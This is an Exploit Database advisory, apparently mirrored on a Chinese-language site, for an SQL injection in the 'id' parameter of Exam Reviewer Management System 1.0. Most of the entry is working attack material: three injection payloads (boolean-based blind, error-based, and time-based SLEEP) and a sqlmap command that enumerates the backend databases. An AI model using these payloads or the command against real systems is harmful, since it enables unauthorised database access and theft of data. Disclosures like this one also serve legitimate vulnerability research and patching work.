Exam Reviewer Management System 1.0 – ‘id’ SQL Injection

• Exploit Database
• 118 阅读

• 作者： Juli Agarwal
  日期： 2022-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50725/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

  # Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection # Date: 2022-02-18 # Exploit Author:Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html   # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code   # Version: 1.0 # Tested on: Windows 10/Kali Linux       Description – The ‘id’ parameter in Exam Reviewer Management System web application is vulnerable to SQL Injection   Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1       POC:-       ---   Parameter: id (GET)   Type: boolean-based blind   Title: AND boolean-based blind - WHERE or HAVING clause   Payload: p=take_exam&id=1&apos; AND 4755=4755 AND &apos;VHNu&apos;=&apos;VHNu       Type: error-based   Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)   Payload: p=take_exam&id=1&apos; OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND &apos;MCXA&apos;=&apos;MCXA       Type: time-based blind   Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)   Payload: p=take_exam&id=1&apos; AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND &apos;vqGg&apos;=&apos;vqGg---       *SQLMAP COMMAND*       *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1 <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*